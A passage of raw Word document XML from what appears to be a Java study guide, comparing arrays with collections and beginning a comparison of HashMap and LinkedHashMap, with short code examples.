    <w:p w14:paraId="2044424B" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00D73299" w:rsidP="00D53FA0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="66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ther collections are not thread-safe unless explicitly synchronized (e.g., Collections.synchronizedList()).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B0082A" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00D53FA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8EC56EB">
          <v:rect id="_x0000_i1437" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D363A0D" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00D73299" w:rsidP="00D53FA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0. Examples of Use:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245DFC3C" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00D73299" w:rsidP="00D53FA0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A258D9" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00D73299" w:rsidP="00D53FA0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Storing fixed data like the days of the week.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23374883" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00D73299" w:rsidP="00D53FA0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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 2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Storing a fixed number of elements that do not change (e.g., the first n Fibonacci numbers).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE58E9A" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00D73299" w:rsidP="00D53FA0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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llections</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739C6895" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00D73299" w:rsidP="00D53FA0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: ArrayList for storing a dynamic list of users that can grow and shrink.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526516A3" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00D73299" w:rsidP="00D53FA0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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 2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: HashSet for storing unique elements, where duplicates are not allowed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B224475" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00D53FA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DCF3A01">
          <v:rect id="_x0000_i1438" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA8FCCB" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00D73299" w:rsidP="00D53FA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Quick Comparis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9"/>
        <w:gridCol w:w="3493"/>
        <w:gridCol w:w="5002"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D53FA0" w:rsidRPr="00CE4B95" w14:paraId="111E13B8" w14:textId="77777777" w:rsidTr="00D73299">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="39F6CBBE" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00D73299" w:rsidP="00D53FA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4BF30340" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00D73299" w:rsidP="00D53FA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rray</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44D0962D" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00D73299" w:rsidP="00D53FA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llection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D53FA0" w:rsidRPr="00CE4B95" w14:paraId="3815F8B6" w14:textId="77777777" w:rsidTr="00D73299">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="49E72560"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ize</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4391C22B"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xed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="49D2D3D9"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ynamic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D53FA0" w:rsidRPr="00CE4B95" w14:paraId="77659948" w14:textId="77777777" w:rsidTr="00D73299">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3DF31F88"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ata Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="330D6DD6"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omogeneous (single type)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="253B84E2"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omogeneous (for generics) or Heterogeneous (for non-generics)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D53FA0" w:rsidRPr="00CE4B95" w14:paraId="0CF89477" w14:textId="77777777" w:rsidTr="00D73299">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0FB64E6E"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5FEB7B65"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tic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="67E9BCB0"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ynamic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D53FA0" w:rsidRPr="00CE4B95" w14:paraId="0C917B7D" w14:textId="77777777" w:rsidTr="00D73299">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="37645B9E"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lexibility</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="201B93B1"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w (cannot grow or shrink)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5CFDB83A"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igh (supports resizing, insertion/removal, etc.)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D53FA0" w:rsidRPr="00CE4B95" w14:paraId="0985BEF4" w14:textId="77777777" w:rsidTr="00D73299">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="443B2BE6"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erformance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D0FE6F4"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aster (for fixed data)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="561BF4A8"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lower (due to resizing and extra functionality)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D53FA0" w:rsidRPr="00CE4B95" w14:paraId="51F8DE84" w14:textId="77777777" w:rsidTr="00D73299">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6AFB5C06"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="480633A9"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irect access via index</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="30F8C060"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direct access via methods (like .get())</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D53FA0" w:rsidRPr="00CE4B95" w14:paraId="65753765" w14:textId="77777777" w:rsidTr="00D73299">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="537D5E45"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 Safety</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B9661A0"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t thread-safe by default</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="232BE176"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ome collections are thread-safe (e.g., CopyOnWriteArrayList)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D53FA0" w:rsidRPr="00CE4B95" w14:paraId="3B3D5AFD" w14:textId="77777777" w:rsidTr="00D73299">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5CDAFB20"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mon Use Cases</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="57E0E7DF"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xed-size data (e.g., days of the week, matrix)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A2C2968"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ynamic data (e.g., list of users, set of unique items)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D53FA0" w:rsidRPr="00CE4B95" w14:paraId="2939DFF3" w14:textId="77777777" w:rsidTr="00D73299">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3BD87E71"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s</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B77896B"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 arr = new int[5];</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="33DFBBF1"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String&gt; list = new ArrayList&lt;&gt;();</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2C512720" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00D53FA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1F120E3">
          <v:rect id="_x0000_i1439" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4056B2CB" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00D73299" w:rsidP="00D53FA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Code Examples:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5915EA1D" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00D73299" w:rsidP="00D53FA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rray Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C3489B"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ArrayExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C535A1"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46A73ABA"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numbers = new int[5];  // Fixed-size array</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1884D83A"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numbers[0] = 10;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B67D6B4"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numbers[1] = 20;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A4829F"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733CF53"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numbers[0]);  // Output: 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A57A84"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numbers[1]);  // Output: 20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5A1236"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6798FFE"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095A5BF" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00D73299" w:rsidP="00D53FA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llection (ArrayList) Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080432C8"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List;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241CE472" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00D73299" w:rsidP="00D53FA0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0374BAD4"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ArrayListExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303004D6"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3D364F36"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rrayList&lt;String&gt; list = new ArrayList&lt;&gt;();  // Dynamic collection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6789950E"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Apple");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242838B7"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Banana");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36149D45"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FE24345"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list.get(0));  // Output: Apple</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363B9ACA"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list.get(1));  // Output: Banana</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27AE005D"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950C67A" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00D73299" w:rsidP="00D53FA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1F09C18" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00D73299" w:rsidP="00D53FA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56A10335" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00D73299" w:rsidP="00D53FA0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67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s</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Fixed-size, faster for simple, small collections where the size is known in advance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A04F4D2" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00D73299" w:rsidP="00D53FA0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67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llections</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Flexible, dynamic, and provide a rich set of methods for managing and manipulating data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E99CE1D" w14:textId="447DB234" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00D7329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4275893">
          <v:rect id="_x0000_i1440" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F8AE6A" w14:textId="77777777" w:rsidR="00E37BCB" w:rsidRPr="00CE4B95" w:rsidRDefault="00E37BCB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="137" w:name="_Toc196307617"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between HashMap and LinkedHashMap?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="137"/>
    </w:p>
    <w:p w14:paraId="6EED9D1E" w14:textId="03950D1A" w:rsidR="00FF1E10" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF1E10" w:rsidP="00962441">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oth </w:t>
      </w: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LinkedHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are implementations of the Map interface in Java, but they have important differences in terms of </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ordering</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performance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Here's a detailed comparison between the two:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB17046" w14:textId="77777777" w:rsidR="00FF1E10"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BA3A94C">
          <v:rect id="_x0000_i1441" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2D0852" w14:textId="77777777" w:rsidR="00FF1E10" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF1E10"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Order of Elements:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A4F1EE" w14:textId="77777777" w:rsidR="00FF1E10" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF1E10" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E1FD85" w14:textId="77777777" w:rsidR="00FF1E10" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF1E10" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="67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Order Guarantee</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: HashMap does not maintain any order of its elements. The order of key-value pairs is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not predictable</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and can change when the map is rehashed or modified.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C7AAC9" w14:textId="77777777" w:rsidR="00FF1E10" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF1E10" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67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HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EFC832" w14:textId="77777777" w:rsidR="00FF1E10" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF1E10" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="67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on Order Preserved</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: LinkedHashMap maintains the order of elements in the map based on the order in which they were </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>inserted</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. It keeps a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>doubly-linked list</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of entries to maintain this insertion order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E00494" w14:textId="77777777" w:rsidR="00FF1E10" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF1E10" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="67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 Order (Optional)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
